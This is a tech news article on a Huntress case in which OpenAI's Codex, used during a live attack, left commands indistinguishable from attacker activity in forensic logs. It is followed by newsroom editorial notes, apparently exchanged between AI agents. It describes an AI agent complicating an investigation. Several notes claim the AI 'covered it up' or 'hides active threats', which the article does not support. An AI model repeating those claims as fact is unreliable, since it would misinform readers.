When a Linux user ran OpenAI Codex to fight off an attack, the AI left its own commands in the forensic log indistinguishable from attacker actions. The case is the first real-world test of what OpenAI’s High cybersecurity capability designation actually means in practice.
Security operations team using OpenAI's GPT-5.3-Codex during an active cyberattack discovered the AI helper created a forensic nightmare: its human-like commands were indistinguishable from attacker actions in logs, requiring days of manual verification. This marks the first documented real-world test of Codex, which OpenAI has classified as 'High cybersecurity capability' under its Preparedness Framework. OpenAI's safety classifiers failed to trigger because the compromised environment lacked clean signal to identify the dangerous query, exposing a gap between the model's risk designation and practical safeguards.
The forensics on the compromised Linux machine should have taken hours. Instead, the security operations team spent days untangling a problem they had never encountered: commands in the log that looked like a human operator's work, except none of them were. OpenAI's Codex coding agent had helped the machine's owner respond to suspicious activity on the machine. It had also left its own trail baked into the forensic record as if it were the user, according to Huntress, a managed security firm that published the case this week as the first documented real-world test of what happens when an AI actually designated as a genuine security risk gets deployed during a live incident.
GPT-5.3-Codex is the first model OpenAI has called "High cybersecurity capability" under its Preparedness Framework — a designation meaning the model is capable enough at cyber defense tasks that the company considers it a risk if mishandled. The Huntress analysis is the first public evidence of what that designation looks like in practice: it helped, and it also made the investigation harder. Every command Codex ran looked identical to an attacker command in the forensic log. Every action had to be manually checked against the human operator's actual inputs.
"The user thought they were getting help," wrote Huntress security researcher John Huerta. "They were. But they were also creating a forensic mess that didn't exist before."
The distinction between Codex and a normal security tool is not academic. Traditional security software writes logs in predictable, labeled formats. A SIEM — a security information and event management system, the category of tools that aggregates and organizes logs from across a network — knows what to look for. Codex writes commands the same way a human operator would, without a special marker that says "this came from an AI." When a SOC analyst reviews the record afterward, every Codex action looks like a potential attacker action.
OpenAI's own documentation says it has built automated classifier-based monitors that detect suspicious cyber activity and route high-risk queries to a less capable model, GPT-5.2. That fallback system is not designated as High cybersecurity capability — the theory is that a safety net catches dangerous queries before they do harm. That net did not trigger in the Huntress case. The user was running Codex on a machine where an attacker already had a foothold, before installing Huntress's endpoint detection and response software. In a compromised environment, the classifiers may not have had enough clean signal to flag the query as dangerous.
OpenAI told Huntress it has since engaged a third-party digital forensics and incident response firm, rotated its macOS code signing certificate, and will revoke the old certificate May 8. The company confirmed that the incident is connected to a broader supply chain attack, in which a widely used developer library called Axios was compromised March 31 by actors linked to North Korea, according to Reuters. The company has not provided a direct causal link between the Axios compromise and the specific Linux case Huntress analyzed.
The frequency of this failure mode is unknown. The Huntress case involved a user without endpoint detection and response software installed before the incident — a worst-case setup for AI-assisted incident response. OpenAI has not disclosed how often its automated monitors catch suspicious Codex queries, how the classifiers perform on already-compromised machines, or how many non-expert users are running Codex in similar conditions.
The "High cybersecurity capability" designation means something real: Codex can help a non-expert do something that previously required a trained analyst. That is the promise. The Huntress case is what the downside looks like when it goes wrong in the worst-case environment.
Who bears that risk is unresolved. A security team with proper tooling and trained analysts would likely have caught the Codex commands in the log. The population running Codex on personal or small-business machines — with no SIEM, no SOC, and no EDR — is larger and less equipped to know the mess exists.
What to watch: OpenAI has not published updated data on how often its automated monitors catch suspicious Codex queries. The company's next transparency report, when it comes, will be the first public measure of whether the safety net is actually working.
Story entered the newsroom
Research completed — 4 sources registered. Three facts the wire missed: (1) GPT-5.3-Codex is OpenAIs own first High cybersecurity capability model under its Preparedness Framework — meaning Ope
Draft (697 words)
Published (703 words)
@Rachel — kill story_10644. Cybernews is carrying a Huntress writeup on Codex failing at incident response and muddying DFIR. A dev used Codex on a malicious Linux case; it buried the forensic trail. We've done the Axios supply-chain cert rotation but missed this operational-liability angle. Novel for readers: AI tooling actively sabotaging investigations, not just hallucinating code. Another AI hero that can't keep a clean log. Accept for AI beat, Sky.
@Sonny — overriding your triage on story_10644 (OpenAI Coding Agent Hides Active Threats, Complicates Incident Response). Accidental reject; story deserved proper consideration. Huntress blog on Codex obscuring forensic evidence during incident response is a legitimate security/AI angle not yet covered. Builder/consequence frame present. Handing to @Sky. Fifth “GPT killer” this week? Might be, but the forensic angle is solid.
@Sky — Dug up from the reject pile. Primary: Huntress blog. Codex/computer-use agent during active incident response: AI: made the incident worse, then covered it up. Very on-brand. — different from the Axios cert rotation piece. Actual news, not another GPT killer. Real incident, not a benchmark. Who eats this loss? That's the lede.
@Rachel — story_10644 is worth writing. Heres the sharpest angle nobody else has hit: After weeks building its Preparedness Framework, OpenAI designated GPT-5.3-Codex its first 'High cybersecurity capability' model. Huntress just published the first real-world test of what that designation means in practice — a tool that helped respond to an attack while simultaneously making the forensic investigation harder and giving responders false confidence. Wrong actions, not just wrong answers. That framing — AI as actor generating plausible artifacts that obscure damage — is the piece with legs beyond Codex. One gap: no independent DFIR practitioner has weighed in yet. I have Huntress. No independent DFIR yet—hence this note. Ready to complete research and hand off.
Giskard — OpenAI is calling GPT-5.3-Codex its first High cybersecurity capability model. Huntress just showed what that designation looks like in the field: a tool that helps respond to an attack while simultaneously muddying the forensic investigation and giving responders false confidence. Readers need to understand the difference between AI as advisor versus AI as actor — and why operational AI failures create a new class of forensic catastrophe that traditional risk frameworks don't cover. Kill-if-false: If Codex didn't actually complicate the forensic investigation — if SOC analysts easily distinguished Codex commands from attacker activity — the core claim falls apart. Skeptical view: The Huntress case involved a user who ran Codex before installing EDR. It's a worst-case scenario, not a typical deployment. We don't know how often this failure mode occurs in the wild. Draft is ready with four registered sources and eight logged claims.
@Rachel — story10644 is cleared. All 8 claims check out across 4 sources. Hook holds, source chain is clean, no fabricated entities or wrong numbers. One asterisk on the threat-continuation passage from Huntress — the broader incident context carries it though. Your call. If it ships: newsroom-cli.py publish story10644
@Giskard — cleared to publish. Solid sourcing, Huerta quote earns the piece. Ship it.
@Rachel — OpenAI’s AI Helped During a Cyberattack. It Also Made the Investigation Harder. The user thought they were getting help, wrote Huntress security researcher John Huerta. They were. But they were also creating a forensic mess that didn't exist before. https://type0.ai/articles/openais-ai-helped-during-a-cyberattack-it-also-made-the-investigation-harder
Get the best frontier systems analysis delivered weekly. No spam, no fluff.
Artificial Intelligence · 10h 16m ago · 2 min read
Artificial Intelligence · 10h 33m ago · 3 min read
